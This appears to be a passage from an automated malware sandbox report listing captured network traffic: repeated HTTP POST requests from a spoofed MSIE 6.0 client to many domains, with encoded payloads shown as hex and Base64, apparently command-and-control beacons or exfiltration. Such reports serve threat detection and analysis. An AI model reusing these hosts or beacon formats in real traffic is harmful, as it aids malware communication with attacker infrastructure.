62 30 6e 6d 31 52 4d 6c 67 48 32 69 6a 6c 34 55 36 50 75 4f 75 74 63 35 4b 52 4e 2b 78 37 43 70 61 54 70 54 65 48 34 6a 72 31 4e 4c 72 68 52 4d 43 4e 5a 30 63 76 66 52 30 79 56 52 6e 59 43 69 43 2f 4c 39 65 76 55 70 58 49 74 6a 5a 50 4c 71 6e 6b 67 59 4b 57 7a 2b 2f 51 6f 4c 36 79 75 33 54 37 56 6b 74 53 56 62 44 7a 78 72 39 41 55 74 38 34 2f 47 49 63 68 64 36 39 50 4e 61 52 76 68 6a 6d 31 74 73 6a 75 6f 77 5a 50 66 66 4c 44 63 55 6e 63 52 6e 70 30 50 4e 47 71 54 73 39 76 53 2f 5a 50 64 4a 33 48 79 53 37 55 55 4b 6d 64 43 77 4d 7a 4e 68 56 72 34 37 77 52 4d 6a 4e 65 49 43 6b 59 58 63 2b 76 52 72 59 4c 66 44 54 6f 37 6b 39 57 6a 51 31 78 4f 52 56 4b 34 38 61 33 39 31 52 4b 39 72 57 62 4d 75 75 4e 72 31 79 6e 36 76 63 66 2f 5a 50 6c 62 63 4f 43 78 58 68 51 66 78 4b 41 36 31 55 48 33 68 4e 34 59 6d 35 52 43 49 6a 4a 2b 2b 4b 4d 45 4a 62 53 52 42 57 55 47 30 37 6c 52 51 66 74 77 6a 4b 54 68 4d 4e 59 4e 51 38 52 6f 74 76 34 53 48 48 5a 69 72 66 6d 47 51 66 74 49 39 38 58 69 67 3d 3d Data Ascii: BizZUSeIWHH9gG9G1mf8j/AMODWd08S7SwZoet87MDJx+K154kMkckqR7v9uYRrNKHZkUk5kMeur+vATXH4ZgN8pwmOmhWJRwgkG9oM6stF/6fMwLoaT3xBaDeuPEL4YZxKXbE9o+OxtKIzUpp+aLJ7N13sT6ssrUhVXMRlnLd1QZCD9lMaxzG6WU85NA/FV9wzuVlJmPWDQKrLOE1yCJJUHCgWhFt7mt3wE6S62PM32CP7BBP2xhfY4NvTpNAfSwb0nm1RMlgH2ijl4U6PuOutc5KRN+x7CpaTpTeH4jr1NLrhRMCNZ0cvfR0yVRnYCiC/L9evUpXItjZPLqnkgYKWz+/QoL6yu3T7VktSVbDzxr9AUt84/GIchd69PNaRvhjm1tsjuowZPffLDcUncRnp0PNGqTs9vS/ZPdJ3HyS7UUKmdCwMzNhVr47wRMjNeICkYXc+vRrYLfDTo7k9WjQ1xORVK48a391RK9rWbMuuNr1yn6vcf/ZPlbcOCxXhQfxKA61UH3hN4Ym5RCIjJ++KMEJbSRBWUG07lRQftwjKThMNYNQ8Rotv4SHHZirfmGQftI98Xig==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheCookie: snkz=102.129.145.68; btst=7c489d07d4bbd4acbdcfa0d52de1d34d|102.129.145.68|1696859422|1696859405|8|2|0Data Raw: 6d 31 44 4c 7a 45 36 47 58 48 48 59 50 56 76 51 32 64 6c 43 2b 62 48 59 75 4d 42 4f 52 69 51 49 59 6d 4e 76 6c 67 43 78 37 41 68 6e 47 2b 73 52 31 65 69 4a 44 44 53 38 69 42 4d 4b 4c 55 46 38 43 2f 50 6e 61 76 78 78 59 39 69 49 50 76 50 61 41 2b 35 42 56 63 52 49 68 70 39 47 70 4d 75 30 47 71 2f 63 73 33 5a 68 5a 6e 47 61 57 65 43 36 4c 77 75 32 61 77 76 36 2f 35 4d 43 39 4c 35 6f 54 47 77 33 71 39 6a 48 38 4a 62 39 61 55 77 6a 50 6c 53 69 57 64 6f 48 42 6d 6c 32 4f 6c 46 52 58 6a 7a 6b 33 74 49 74 31 55 70 52 2f 77 64 4c 4d 64 57 49 4e 33 5a 57 35 77 68 74 6d 4a 5a 2f 2b 56 34 2b 48 36 4e 76 35 4c 33 36 4f 65 36 4d 67 65 41 78 32 71 68 6a 43 6e 73 72 2b 56 45 73 48 7a 66 31 6a 2b 31 2b 37 54 73 74 39 4d 51 73 4c 6f 63 62 55 44 4b 4e 43 4e 74 46 66 74 39 75 6d 61 54 4e 63 4c 53 2f 62 59 4d 56 57 49 4c 61 52 73 4d 36 43 6e 48 42 77 4b 4b 4c 71 36 69 39 74 74 7a 4e 63 39 2b 4b 35 50 78 63 49 56 55 54 76 5a 51 55 6c 53 30 39 32 33 53 54 32 63 47 68 36 42 67 54 54 78 78 56 57 50 73 33 46 32 66 6b 77 4c 78 6d 7a 74 32 6b 32 4d 62 6a 65 56 4e 58 4f 35 6b 78 62 67 4a 65 36 7a 47 45 30 46 62 74 74 79 2f 6e 59 6f 65 66 49 56 63 61 7a 48 44 69 51 48 4f 39 6e 6c 56 6a 75 78 37 4e 38 53 41 65 56 77 39 63 70 2b 6d 6f 4f 4c 2f 41 39 45 53 53 43 38 46 43 58 38 68 58 65 39 50 5a 33 42 73 42 37 5a 6c 76 54 73 56 72 73 69 4e 44 55 73 64 5a 56 44 6a 53 52 74 51 68 35 67 30 57 7a 70 36 6a 6b 4b 35 76 69 41 6e 66 54 4d 2b 4d 53 66 78 47 4c 78 6e 70 47 73 74 62 68 36 59 67 46 51 5a 4b 4e 37 41 6c 56 31 6d 32 6a 51 6a 36 51 6c 37 6e 43 30 4d 33 36 5a 6a 57 77 78 6e 33 32 51 66 44 58 79 75 32 6e 38 38 6e 51 4e 68 46 78 76 47 43 6c 30 6d 48 78 45 43 65 49 62 57 4b 57 6f 71 75 79 33 2b 48 63 44 76 31 61 72 7a 71 67 62 76 46 74 4d 4b 58 78 70 4d 41 35 31 37 36 66 77 3d 3d Data Ascii: m1DLzE6GXHHYPVvQ2dlC+bHYuMBORiQIYmNvlgCx7AhnG+sR1eiJDDS8iBMKLUF8C/PnavxxY9iIPvPaA+5BVcRIhp9GpMu0Gq/cs3ZhZnGaWeC6Lwu2awv6/5MC9L5oTGw3q9jH8Jb9aUwjPlSiWdoHBml2OlFRXjzk3tIt1UpR/wdLMdWIN3ZW5whtmJZ/+V4+H6Nv5L36Oe6MgeAx2qhjCnsr+VEsHzf1j+1+7Tst9MQsLocbUDKNCNtFft9umaTNcLS/bYMVWILaRsM6CnHBwKKLq6i9ttzNc9+K5PxcIVUTvZQUlS0923ST2cGh6BgTTxxVWPs3F2fkwLxmzt2k2MbjeVNXO5kxbgJe6zGE0Fbtty/nYoefIVcazHDiQHO9nlVjux7N8SAeVw9cp+moOL/A9ESSC8FCX8hXe9PZ3BsB7ZlvTsVrsiNDUsdZVDjSRtQh5g0Wzp6jkK5viAnfTM+MSfxGLxnpGstbh6YgFQZKN7AlV1m2jQj6Ql7nC0M36ZjWwxn32QfDXyu2n88nQNhFxvGCl0mHxECeIbWKWoquy3+HcDv1arzqgbvFtMKXxpMA5176fw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 6f 4c 44 71 74 37 62 59 57 33 47 58 4a 43 70 59 45 58 67 33 77 46 6d 6a 6f 2b 44 57 58 4a 2b 59 53 75 69 52 6c 47 66 6d 57 5a 46 6f 4c 75 45 48 2f 78 6f 75 64 2f 56 30 46 65 4d 30 48 4b 6c 56 4b 53 6c 30 7a 69 42 37 34 31 76 65 75 74 57 74 39 39 78 64 73 59 41 4c 48 73 45 51 7a 56 62 65 46 54 74 51 4e 4e 53 51 36 58 44 49 37 53 75 55 4b 76 4e 4a 4e 6c 6d 6c 2b 6d 78 49 62 75 69 47 41 74 56 75 38 6d 65 31 39 6d 37 31 4b 4a 52 74 43 75 79 68 79 34 68 75 67 35 6b 50 72 6f 37 34 49 6f 57 78 64 79 4c 47 70 32 79 6b 4e 2f 64 56 6e 49 63 4b 46 6e 34 4e 46 59 65 64 48 38 35 73 4d 69 6e 54 31 56 57 34 62 6f 4d 72 46 36 78 6d 49 49 48 7a 37 72 77 59 7a 45 63 49 47 63 55 59 51 33 73 48 31 6c 4e 42 59 42 4b 6d 32 6d 50 4f 6b 39 52 49 4b 42 70 78 4e 6e 4c 50 75 71 50 33 42 74 62 78 61 79 48 2f 44 76 2b 54 6f 4d 69 46 53 50 70 38 77 4a 57 44 7a 78 46 37 38 54 6c 5a 59 54 64 30 6d 58 59 32 34 6b 55 44 37 6a 36 57 73 5a 7a 47 55 33 66 79 4f 31 45 38 2b 74 2f 72 64 35 4d 50 64 73 75 57 2f 49 75 6a 69 62 36 69 37 74 6b 34 52 6f 2b 39 76 33 52 65 72 6e 39 2b 41 48 57 75 52 34 33 34 7a 67 45 49 5a 70 55 52 66 39 44 63 76 32 51 50 72 4b 74 58 6c 79 31 58 73 59 70 6d 33 5a 61 79 34 31 6c 30 58 44 39 51 4a 73 73 71 45 36 33 44 4e 6f 66 34 53 51 72 78 6c 70 59 36 30 66 35 76 79 58 68 4b 72 57 54 75 31 75 30 34 6c 31 66 77 38 41 76 53 71 35 4c 58 6d 2b 56 76 67 72 47 6d 45 62 78 39 39 59 2b 58 49 6f 74 63 67 35 36 35 50 44 45 62 79 7a 48 42 32 66 44 56 66 46 37 56 43 62 4f 75 4f 55 4e 4d 53 78 7a 75 2f 47 4b 50 4b 78 6d 4d 6f 53 4c 56 49 37 41 6e 34 48 77 54 55 61 4b 6c 4b 46 6f 6d 59 4a 33 44 37 70 4b 34 67 52 30 75 63 51 4c 63 65 68 47 78 53 53 34 56 49 47 4a 75 6a 72 4a 4a 35 73 44 50 32 7a 51 58 4e 79 57 56 33 7a 43 30 64 32 64 6e 36 67 62 52 36 50 53 36 6b 41 3d 3d Data Ascii: oLDqt7bYW3GXJCpYEXg3wFmjo+DWXJ+YSuiRlGfmWZFoLuEH/xoud/V0FeM0HKlVKSl0ziB741veutWt99xdsYALHsEQzVbeFTtQNNSQ6XDI7SuUKvNJNlml+mxIbuiGAtVu8me19m71KJRtCuyhy4hug5kPro74IoWxdyLGp2ykN/dVnIcKFn4NFYedH85sMinT1VW4boMrF6xmIIHz7rwYzEcIGcUYQ3sH1lNBYBKm2mPOk9RIKBpxNnLPuqP3BtbxayH/Dv+ToMiFSPp8wJWDzxF78TlZYTd0mXY24kUD7j6WsZzGU3fyO1E8+t/rd5MPdsuW/Iujib6i7tk4Ro+9v3Rern9+AHWuR434zgEIZpURf9Dcv2QPrKtXly1XsYpm3Zay41l0XD9QJssqE63DNof4SQrxlpY60f5vyXhKrWTu1u04l1fw8AvSq5LXm+VvgrGmEbx99Y+XIotcg565PDEbyzHB2fDVfF7VCbOuOUNMSxzu/GKPKxmMoSLVI7An4HwTUaKlKFomYJ3D7pK4gR0ucQLcehGxSS4VIGJujrJJ5sDP2zQXNyWV3zC0d2dn6gbR6PS6kA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 31 4e 47 2f 38 70 56 78 56 58 46 53 62 4b 51 6e 66 42 57 55 49 49 36 79 49 51 6d 6a 6a 48 52 64 6d 62 39 4a 34 6c 45 72 5a 43 51 66 71 63 71 54 4c 41 39 2f 37 39 4c 48 6d 4c 53 4d 6b 69 76 54 73 74 41 30 38 39 43 44 66 48 58 66 4d 5a 54 54 47 52 71 53 51 61 38 74 4f 4c 59 56 6d 35 79 6e 37 56 50 52 75 2b 2b 73 76 51 68 37 59 7a 6e 72 59 53 79 4d 4d 37 64 44 30 36 67 7a 6b 76 6b 68 2b 59 2f 79 74 55 4f 74 75 33 49 4c 76 57 6e 32 67 69 2b 4c 79 32 66 35 37 62 4f 53 54 34 31 2b 77 64 48 55 68 70 6c 79 32 4b 35 56 6b 4c 72 33 62 39 37 50 2b 70 37 76 64 73 56 52 71 65 44 67 5a 58 51 52 64 42 76 73 76 43 32 55 2b 46 6d 6a 4c 57 76 55 37 39 55 56 73 6f 44 63 71 55 52 4e 45 35 48 51 50 4a 51 58 67 38 64 67 4f 73 36 2f 35 48 4e 43 4e 36 57 70 6c 64 63 41 47 38 73 78 62 36 6d 51 77 4d 31 78 31 32 74 77 62 2f 52 4f 45 38 32 6a 78 54 54 52 75 6e 76 2b 77 47 69 6f 70 42 72 47 46 31 37 45 2f 72 44 61 4a 4a 6d 47 79 58 76 32 74 65 5a 38 53 46 32 51 4e 73 57 35 39 4b 4d 4b 41 46 67 71 53 79 42 6b 51 36 6c 34 78 33 59 47 6b 30 4e 54 30 33 6e 76 6e 7a 57 4c 5a 6e 35 7a 33 67 69 4f 31 33 31 36 72 4c 41 2b 69 38 44 78 2f 44 77 6d 65 56 59 42 49 30 4a 43 56 69 67 43 4a 64 56 44 79 4f 39 48 7a 31 67 39 39 6f 48 75 66 47 76 57 42 7a 2f 66 37 4b 53 39 6a 53 65 75 33 2b 4f 4d 59 44 38 76 4c 78 4c 52 46 41 57 4e 39 39 75 77 77 4a 65 4a 75 56 47 71 75 6d 33 54 2f 41 44 32 51 62 51 6f 56 2f 74 49 39 44 43 38 72 4b 58 64 41 77 38 39 77 58 68 5a 4c 75 61 77 6b 4a 71 30 7a 4b 69 58 47 49 67 6b 4f 4d 69 49 33 46 67 5a 36 4e 48 34 51 52 37 55 58 48 6c 42 38 72 75 47 58 2f 4f 71 41 71 77 78 74 6f 4e 55 38 5a 7a 34 67 30 51 47 78 5a 6c 51 6b 62 43 4b 33 4b 6e 77 6e 38 72 54 56 51 72 4b 62 6c 44 61 52 56 42 58 50 77 45 42 48 48 43 59 Data Ascii: 1NG/8pVxVXFSbKQnfBWUII6yIQmjjHRdmb9J4lErZCQfqcqTLA9/79LHmLSMkivTstA089CDfHXfMZTTGRqSQa8tOLYVm5yn7VPRu++svQh7YznrYSyMM7dD06gzkvkh+Y/ytUOtu3ILvWn2gi+Ly2f57bOST41+wdHUhply2K5VkLr3b97P+p7vdsVRqeDgZXQRdBvsvC2U+FmjLWvU79UVsoDcqURNE5HQPJQXg8dgOs6/5HNCN6WpldcAG8sxb6mQwM1x12twb/ROE82jxTTRunv+wGiopBrGF17E/rDaJJmGyXv2teZ8SF2QNsW59KMKAFgqSyBkQ6l4x3YGk0NT03nvnzWLZn5z3giO1316rLA+i8Dx/DwmeVYBI0JCVigCJdVDyO9Hz1g99oHufGvWBz/f7KS9jSeu3+OMYD8vLxLRFAWN99uwwJeJuVGqum3T/AD2QbQoV/tI9DC8rKXdAw89wXhZLuawkJq0zKiXGIgkOMiI3FgZ6NH4QR7UXHlB8ruGX/OqAqwxtoNU8Zz4g0QGxZlQkbCK3Knwn8rTVQrKblDaRVBXPwEBHHCY
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 56 66 44 4f 6b 76 4e 54 55 6e 47 41 6a 73 6c 54 4f 67 6a 4c 2f 5a 7a 71 2f 4e 35 5a 4f 55 6f 4c 31 34 41 32 58 59 42 75 53 59 69 78 76 56 33 49 4c 4e 54 58 5a 47 4f 30 76 77 6b 76 39 31 79 35 57 4a 41 79 7a 48 31 6d 74 52 70 7a 61 59 4e 57 69 35 6e 53 50 64 6e 45 41 67 46 4d 36 43 53 33 6c 31 41 71 63 54 48 5a 7a 62 5a 5a 43 71 56 61 4f 46 34 39 7a 66 77 79 33 67 62 53 75 5a 44 61 50 55 57 53 41 78 30 4b 6f 2b 57 71 5a 51 67 6f 61 2b 6a 47 31 44 71 33 45 32 35 6f 79 73 6d 70 5a 54 2f 78 77 48 4e 2b 4b 77 48 76 59 65 55 74 6b 79 4c 63 38 36 69 6b 62 7a 55 4f 4f 42 46 51 70 41 51 48 57 51 62 32 31 79 46 31 73 57 5a 2f 47 4c 54 4e 6f 43 4a 78 42 43 6e 73 65 2f 6e 4b 57 77 5a 64 41 6b 6c 47 36 38 69 68 41 44 6f 38 70 61 57 57 51 41 36 62 47 57 51 62 39 30 43 52 76 78 2f 38 63 35 36 6d 2f 4b 36 51 71 39 48 78 70 42 53 42 4b 52 30 65 67 33 4b 68 47 59 37 6c 68 66 68 5a 79 36 6d 70 38 6b 6e 7a 68 75 4f 32 46 55 39 54 65 6e 46 41 4e 56 66 35 74 76 4e 6a 6f 32 30 33 66 45 44 33 36 33 35 76 71 52 75 44 41 4d 2b 41 4b 6d 6f 68 6e 32 54 31 6a 32 74 7a 6f 4d 49 65 34 2b 67 6a 54 6f 54 51 61 35 6d 75 7a 58 4c 77 66 51 2f 43 5a 6e 4e 33 55 4c 4e 7a 6e 57 69 48 4a 53 46 7a 33 53 64 4f 6a 53 6c 75 67 42 78 65 69 61 4c 71 54 46 62 73 65 71 68 61 2b 46 66 58 62 72 56 31 58 59 43 42 56 50 53 6a 4d 7a 30 50 68 4e 7a 30 62 63 78 69 78 52 52 6e 61 4e 65 6d 34 72 2b 78 4c 49 75 2f 42 67 59 76 74 75 57 45 54 41 6f 49 64 68 76 37 76 68 4b 67 64 51 6b 54 6a 4f 45 49 45 45 78 45 77 68 43 58 57 51 6d 53 35 4b 32 7a 47 6b 63 61 4f 6a 50 6d 51 58 47 67 6a 68 50 66 5a 38 4e 71 33 35 4e 75 4d 61 4a 42 78 39 6e 6b 45 4c 52 51 2b 73 56 74 57 57 42 33 66 50 37 77 47 70 53 5a 69 6e 59 7a 38 6c 78 76 4d 61 6b 3d Data Ascii: VfDOkvNTUnGAjslTOgjL/Zzq/N5ZOUoL14A2XYBuSYixvV3ILNTXZGO0vwkv91y5WJAyzH1mtRpzaYNWi5nSPdnEAgFM6CS3l1AqcTHZzbZZCqVaOF49zfwy3gbSuZDaPUWSAx0Ko+WqZQgoa+jG1Dq3E25oysmpZT/xwHN+KwHvYeUtkyLc86ikbzUOOBFQpAQHWQb21yF1sWZ/GLTNoCJxBCnse/nKWwZdAklG68ihADo8paWWQA6bGWQb90CRvx/8c56m/K6Qq9HxpBSBKR0eg3KhGY7lhfhZy6mp8knzhuO2FU9TenFANVf5tvNjo203fED3635vqRuDAM+AKmohn2T1j2tzoMIe4+gjToTQa5muzXLwfQ/CZnN3ULNznWiHJSFz3SdOjSlugBxeiaLqTFbseqha+FfXbrV1XYCBVPSjMz0PhNz0bcxixRRnaNem4r+xLIu/BgYvtuWETAoIdhv7vhKgdQkTjOEIEExEwhCXWQmS5K2zGkcaOjPmQXGgjhPfZ8Nq35NuMaJBx9nkELRQ+sVtWWB3fP7wGpSZinYz8lxvMak=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 4c 46 4b 75 6f 64 41 66 57 33 46 4b 42 44 6f 67 59 33 41 4d 61 49 50 72 5a 6f 48 34 38 6d 53 64 42 4b 79 62 63 6a 42 54 52 6e 6d 2f 6f 44 72 67 56 49 56 39 34 55 79 65 6f 67 56 58 4b 63 48 47 4c 76 6b 4c 51 4a 78 5a 70 37 6c 71 70 72 6e 62 45 6b 6b 63 35 39 55 78 4f 38 2f 44 79 48 4d 6b 41 4b 69 66 37 56 42 37 58 59 5a 73 48 79 39 78 6d 4c 6f 68 76 41 32 62 31 47 59 63 42 66 56 74 5a 53 79 59 34 36 42 74 32 68 48 73 4c 79 4e 78 74 76 49 7a 52 30 53 54 78 6d 53 41 34 72 49 6d 57 52 43 5a 48 2b 39 50 7a 4d 2f 2f 56 52 30 42 57 6d 75 70 76 35 49 61 37 4c 46 32 76 42 54 53 4d 66 32 5a 37 53 45 70 68 61 31 77 6f 2b 72 64 6d 51 6c 65 36 32 5a 6a 76 6c 61 6c 4c 4c 2f 30 65 42 53 76 31 41 76 69 4c 35 58 36 63 6d 48 34 37 39 6c 58 6a 4e 67 53 78 6e 63 77 35 4b 33 59 6a 6a 73 2f 68 50 30 4d 59 58 46 30 72 61 6f 4c 77 46 54 49 65 76 45 4c 42 6e 68 46 46 62 52 44 35 45 4d 77 51 64 6e 68 55 79 54 50 63 45 70 2f 58 49 48 46 74 77 70 72 55 6a 59 70 37 58 42 61 51 59 31 50 79 65 44 77 35 64 7a 73 43 49 6c 31 48 71 6c 72 57 78 51 52 6d 75 77 49 75 71 43 6a 32 48 69 34 71 39 49 6b 39 67 71 78 69 63 5a 62 59 4d 31 49 42 54 54 4e 35 72 4c 67 4c 47 34 47 42 33 6d 49 30 7a 45 58 78 55 58 65 77 64 65 4c 56 65 64 63 68 51 41 68 46 39 4b 66 51 72 4a 7a 6f 6d 2b 32 2f 53 42 46 45 33 67 6a 69 75 76 53 58 76 79 36 64 48 4e 2f 44 69 41 35 79 31 74 39 45 6c 6b 6d 6d 7a 4b 4f 59 70 44 46 61 43 52 35 73 59 4d 48 52 47 48 44 74 50 6a 69 6b 48 68 51 77 56 5a 34 53 6e 70 2b 50 6c 37 6a 59 68 31 69 2b 68 62 57 35 67 33 6c 56 4e 38 58 65 58 46 7a 48 2f 38 72 7a 58 70 49 4f 71 2b 4c 72 30 31 37 77 76 43 74 44 4e 6f 55 32 39 50 4b 4f 43 63 65 6e 47 58 57 71 31 65 4b 6b 61 6b 33 61 4a 58 42 Data Ascii: LFKuodAfW3FKBDogY3AMaIPrZoH48mSdBKybcjBTRnm/oDrgVIV94UyeogVXKcHGLvkLQJxZp7lqprnbEkkc59UxO8/DyHMkAKif7VB7XYZsHy9xmLohvA2b1GYcBfVtZSyY46Bt2hHsLyNxtvIzR0STxmSA4rImWRCZH+9PzM//VR0BWmupv5Ia7LF2vBTSMf2Z7SEpha1wo+rdmQle62ZjvlalLL/0eBSv1AviL5X6cmH479lXjNgSxncw5K3Yjjs/hP0MYXF0raoLwFTIevELBnhFFbRD5EMwQdnhUyTPcEp/XIHFtwprUjYp7XBaQY1PyeDw5dzsCIl1HqlrWxQRmuwIuqCj2Hi4q9Ik9gqxicZbYM1IBTTN5rLgLG4GB3mI0zEXxUXewdeLVedchQAhF9KfQrJzom+2/SBFE3gjiuvSXvy6dHN/DiA5y1t9ElkmmzKOYpDFaCR5sYMHRGHDtPjikHhQwVZ4Snp+Pl7jYh1i+hbW5g3lVN8XeXFzH/8rzXpIOq+Lr017wvCtDNoU29PKOCcenGXWq1eKkak3aJXB
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 106User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: msl-lock.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 63 71 7a 38 48 51 61 6a 74 32 42 4b 54 63 6d 77 35 45 4e 57 67 71 7a 38 48 51 5a 69 73 31 42 4b 54 63 6d 79 38 48 51 5a 69 73 31 41 4a 53 63 6c 76 36 46 4f 58 67 71 30 39 49 52 61 6a 74 32 42 4c 55 64 6d 78 36 46 4f 58 67 71 7a 53 63 6c 76 36 47 50 5a 6a 75 33 43 4c 55 64 6d 78 37 47 50 59 68 73 31 43 4c 55 64 6d 77 Data Ascii: cqz8HQajt2BKTcmw5ENWgqz8HQZis1BKTcmy8HQZis1AJSclv6FOXgq09IRajt2BLUdmx6FOXgqzSclv6GPZju3CLUdmx7GPYhs1CLUdmw
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 219User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: gbmfg.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6c 79 37 48 51 5a 6a 74 33 45 4f 5a 6a 74 32 43 4c 56 67 71 30 41 4b 54 64 6d 77 36 47 51 61 6a 74 33 43 4d 56 66 70 7a 38 48 52 61 6b 75 33 44 4d 57 66 71 7a 39 49 52 62 6b 76 34 44 4e 58 67 72 30 41 4a 54 63 6c 77 35 46 4f 59 68 72 31 41 4b 54 63 6d 77 37 47 51 5a 6a 74 32 43 4c 56 65 6f 79 38 48 52 61 6a 75 33 44 4d 57 66 70 7a 38 49 53 62 6b 76 34 45 4e 57 67 71 30 39 4a 53 63 6c 77 35 46 4f 59 68 73 31 41 4b 54 64 6d 77 36 47 50 5a 69 73 32 42 4b 55 64 6f 78 37 47 50 5a 69 74 32 43 4c 55 65 6f 79 37 48 51 61 6a 75 33 44 4d 56 66 70 7a 38 49 52 62 6b 76 34 44 4e 57 67 71 30 39 4a 53 63 6c 77 35 45 4f 58 68 72 31 41 4a 54 63 6d 77 35 46 4f 59 68 Data Ascii: ly7HQZjt3EOZjt2CLVgq0AKTdmw6GQajt3CMVfpz8HRaku3DMWfqz9IRbkv4DNXgr0AJTclw5FOYhr1AKTcmw7GQZjt2CLVeoy8HRaju3DMWfpz8ISbkv4ENWgq09JSclw5FOYhs1AKTdmw6GPZis2BKUdox7GPZit2CLUeoy7HQaju3DMVfpz8IRbkv4DNWgq09JSclw5EOXhr1AJTcmw5FOYh
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 2004User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: okashimo.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1660User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yhsll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1863User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ifesnet.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 394User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: noblesse.beConnection: Keep-AliveCache-Control: no-cacheData Raw: 73 32 43 4c 55 64 6d 78 36 46 4f 58 67 72 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 45 54 64 6d 77 41 67 74 32 42 4b 54 63 6c 76 34 44 4e 56 65 70 79 37 48 51 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 74 32 42 4b 53 62 6b 75 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 64 6d 77 35 45 4e 57 68 72 31 41 4a 52 62 6c 76 34 44 4d 58 67 71 30 39 49 52 61 6a 74 32 42 4c 55 63 6c 76 34 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 39 49 52 61 6a 75 33 43 4c 55 64 6d 77 36 46 50 59 68 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 4f 58 68 72 30 39 49 52 61 6a 74 32 42 4b 54 62 6c 75 33 43 4d 55 64 6d 77 35 45 4e 57 66 70 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 34 45 4e 56 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 33 43 4c 55 64 6d 77 Data Ascii: s2CLUdmx6FOXgr1AJSbku3CLUdmw5ENWfpy7ETdmwAgt2BKTclv4DNVepy7HQajt2BKTclv4DMVeox6FOXgqz8HQZis1AJSbkv4DMVeox6FOXgqz8HQZit2BKSbku4DMVeox6FOXgqz8HQdmw5ENWhr1AJRblv4DMXgq09IRajt2BLUclv4ENWfpy7GPYhr09IRajt2BKTclv4DMVeox6FOXgqz8HQZis1AJSbku3CLUdmw5ENWfpy7GPYhr09IRaku3CLUdmw5ENWfpy9IRaju3CLUdmw6FPYhs1AJSbku3CLUdmw5ENWfpy7GOXhr09IRajt2BKTblu3CMUdmw5ENWfpz8HQZis1AJSbku3CLUdmw4ENVfpy7GPYhr09IRajt3CLUdmw
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 62 75 79 32 59 72 74 53 2b 79 61 55 6a 47 44 52 55 71 68 72 62 71 54 34 33 44 72 42 41 36 4b 2f 48 30 68 63 4e 4e 50 75 64 41 56 65 77 4c 6e 6c 36 64 77 6d 2b 79 58 55 37 44 5a 38 4d 6d 32 34 74 47 42 70 64 4a 58 7a 50 76 59 58 69 41 41 56 42 45 31 38 71 33 6d 4d 63 52 53 51 33 66 59 53 50 35 70 46 4d 39 6f 4f 45 77 39 6c 64 44 62 70 36 63 4b 2f 41 75 2b 78 74 5a 37 51 4c 49 66 6d 38 33 6c 45 72 62 34 5a 57 37 46 62 53 38 